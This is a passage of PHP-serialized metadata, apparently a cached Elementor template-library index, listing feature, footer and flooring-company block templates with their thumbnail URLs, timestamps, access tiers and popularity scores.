12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";i:1520443684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:281;s:16:\"popularity_index\";i:81;s:11:\"trend_index\";i:98;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:564;a:21:{s:4:\"tmpl\";i:567;s:2:\"id\";i:6220;s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";i:1520443685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:282;s:16:\"popularity_index\";i:88;s:11:\"trend_index\";i:189;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:565;a:21:{s:4:\"tmpl\";i:541;s:2:\"id\";i:5983;s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";i:1520443630;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:283;s:16:\"popularity_index\";i:231;s:11:\"trend_index\";i:351;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:566;a:21:{s:4:\"tmpl\";i:540;s:2:\"id\";i:5974;s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";i:1520443629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:286;s:16:\"popularity_index\";i:69;s:11:\"trend_index\";i:181;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:567;a:21:{s:4:\"tmpl\";i:516;s:2:\"id\";i:5624;s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";i:1520443553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:287;s:16:\"popularity_index\";i:93;s:11:\"trend_index\";i:352;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:568;a:21:{s:4:\"tmpl\";i:515;s:2:\"id\";i:5615;s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";i:1520443551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:290;s:16:\"popularity_index\";i:41;s:11:\"trend_index\";i:119;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:569;a:21:{s:4:\"tmpl\";i:539;s:2:\"id\";i:5963;s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";i:1520443626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:291;s:16:\"popularity_index\";i:67;s:11:\"trend_index\";i:133;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:570;a:21:{s:4:\"tmpl\";i:565;s:2:\"id\";i:6204;s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";i:1520443681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:292;s:16:\"popularity_index\";i:217;s:11:\"trend_index\";i:223;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:571;a:21:{s:4:\"tmpl\";i:564;s:2:\"id\";i:6196;s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";i:1520443680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:294;s:16:\"popularity_index\";i:106;s:11:\"trend_index\";i:113;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:572;a:21:{s:4:\"tmpl\";i:1033;s:2:\"id\";i:15033;s:5:\"title\";s:28:\"Flooring Company &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/08/404.png\";s:12:\"tmpl_created\";i:1597739459;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/flooring-company-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:45:\"[\"404\",\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:296;s:16:\"popularity_index\";i:655;s:11:\"trend_index\";i:671;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:573;a:21:{s:4:\"tmpl\";i:1032;s:2:\"id\";i:15042;s:5:\"title\";s:32:\"Flooring Company &#8211; Archive\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Blog.png\";s:12:\"tmpl_created\";i:1597739084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/flooring-company-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:297;s:16:\"popularity_index\";i:320;s:11:\"trend_index\";i:275;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:574;a:21:{s:4:\"tmpl\";i:1031;s:2:\"id\";i:15017;s:5:\"title\";s:31:\"Flooring Company &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Footer.png\";s:12:\"tmpl_created\";i:1597738933;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Footer\"]\";s:10:\"menu_order\";i:299;s:16:\"popularity_index\";i:323;s:11:\"trend_index\";i:192;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:575;a:21:{s:4:\"tmpl\";i:1030;s:2:\"id\";i:15007;s:5:\"title\";s:31:\"Flooring Company &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Header.png\";s:12:\"tmpl_created\";i:1597738896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Header\"]\";s:10:\"menu_order\";i:302;s:16:\"popularity_index\";i:459;s:11:\"trend_index\";i:333;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:576;a:21:{s:4:\"tmpl\";i:1029;s:2:\"id\";i:15052;s:5:\"title\";s:36:\"Flooring Company &#8211; Single post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Single.png\";s:12:\"tmpl_created\";i:1597738858;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/flooring-company-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:303;s:16:\"popularity_index\";i:392;s:11:\"trend_index\";i:226;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:577;a:21:{s:4:\"tmpl\";i:651;s:2:\"id\";i:7837;s:5:\"title\";s:9:\"footer 01\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.14.jpg\";s:12:\"tmpl_created\";i:1524582852;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:305;s:16:\"popularity_index\";i:495;s:11:\"trend_index\";i:539;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:578;a:21:{s:4:\"tmpl\";i:647;s:2:\"id\";i:7937;s:5:\"title\";s:10:\"footer 010\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.5.jpg\";s:12:\"tmpl_created\";i:1524582665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-010/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:308;s:16:\"popularity_index\";i:185;s:11:\"trend_index\";i:115;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:579;a:21:{s:4:\"tmpl\";i:646;s:2:\"id\";i:7950;s:5:\"title\";s:10:\"footer 011\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.4.jpg\";s:12:\"tmpl_created\";i:1524582631;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-011/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:310;s:16:\"popularity_index\";i:244;s:11:\"trend_index\";i:203;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:580;a:21:{s:4:\"tmpl\";i:645;s:2:\"id\";i:7959;s:5:\"title\";s:10:\"footer 012\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.3.jpg\";s:12:\"tmpl_created\";i:1524582605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-012/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:311;s:16:\"popularity_index\";i:177;s:11:\"trend_index\";i:140;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:581;a:21:{s:4:\"tmpl\";i:644;s:2:\"id\";i:7982;s:5:\"title\";s:10:\"footer 013\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.2.jpg\";s:12:\"tmpl_created\";i:1524582468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-013/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:314;s:16:\"popularity_index\";i:209;s:11:\"trend_index\";i:212;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:582;a:21:{s:4:\"tmpl\";i:643;s:2:\"id\";i:7997;s:5:\"title\";s:10:\"footer 014\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.1.jpg\";s:12:\"tmpl_created\";i:1524582343;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-014/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:316;s:16:\"popularity_index\";i:64;s:11:\"trend_index\";i:41;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:583;a:21:{s:4:\"tmpl\";i:693;s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/demo/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:317;s:16:\"popularity_index\";i:240;s:11:\"trend_index\";i:154;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:584;a:21:{s:4:\"tmpl\";i:652;s:2:\"id\";i:7852;s:5:\"title\";s:9:\"footer 02\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.13.jpg\";s:12:\"tmpl_created\";i:1524582875;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:320;s:16:\"popularity_index\";i:199;s:11:\"trend_index\";i:96;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:585;a:21:{s:4:\"tmpl\";i:653;s:2:\"id\";i:7862;s:5:\"title\";s:9:\"footer 03\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.12.jpg\";s:12:\"tmpl_created\";i:1524582903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:321;s:16:\"popularity_index\";i:137;s:11:\"trend_index\";i:91;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:586;a:21:{s:4:\"tmpl\";i:654;s:2:\"id\";i:7871;s:5:\"title\";s:9:\"footer 04\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.11.jpg\";s:12:\"tmpl_created\";i:1524582927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:323;s:16:\"popularity_index\";i:97;s:11:\"trend_index\";i:55;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:587;a:21:{s:4:\"tmpl\";i:655;s:2:\"id\";i:7884;s:5:\"title\";s:9:\"footer 05\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.10.jpg\";s:12:\"tmpl_created\";i:1524582944;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:325;s:16:\"popularity_index\";i:92;s:11:\"trend_index\";i:109;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:588;a:21:{s:4:\"tmpl\";i:656;s:2:\"id\";i:7892;s:5:\"title\";s:9:\"footer 06\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.9.jpg\";s:12:\"tmpl_created\";i:1524583015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:326;s:16:\"popularity_index\";i:132;s:11:\"trend_index\";i:146;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:589;a:21:{s:4:\"tmpl\";i:650;s:2:\"id\";i:7904;s:5:\"title\";s:9:\"footer 07\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.8.jpg\";s:12:\"tmpl_created\";i:1524582814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-07/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:328;s:16:\"popularity_index\";i:203;s:11:\"trend_index\";i:186;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:590;a:21:{s:4:\"tmpl\";i:649;s:2:\"id\";i:7917;s:5:\"title\";s:9:\"footer 08\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.7.jpg\";s:12:\"tmpl_created\";i:1524582788;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-08/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:329;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:144;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:591;a:21:{s:4:\"tmpl\";i:648;s:2:\"id\";i:7927;s:5:\"title\";s:9:\"footer 09\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.6.jpg\";s:12:\"tmpl_created\";i:1524582691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-09/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:331;s:16:\"popularity_index\";i:178;s:11:\"trend_index\";i:100;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:592;a:21:{s:4:\"tmp